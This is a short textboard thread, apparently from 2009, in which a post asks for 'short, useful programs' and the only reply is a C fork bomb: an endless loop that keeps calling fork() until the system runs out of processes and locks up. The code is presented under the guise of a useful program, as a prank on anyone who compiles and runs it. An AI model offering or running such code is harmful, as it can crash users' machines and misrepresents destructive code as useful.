Return Styles: Pseud0ch, Terminal, Valhalla, NES, Geocities, Blue Moon. Entire thread

HAX IT

Name: Anonymous 2009-04-23 2:52

ITT we post short, useful programs.

Name: Anonymous 2009-04-24 22:51

#include <stdio.h>

int main(){

for(;;){

if (fork() == 0){

fork();
}
}
}

Newer Posts
Don't change these.
Name: Email:
Entire Thread Thread List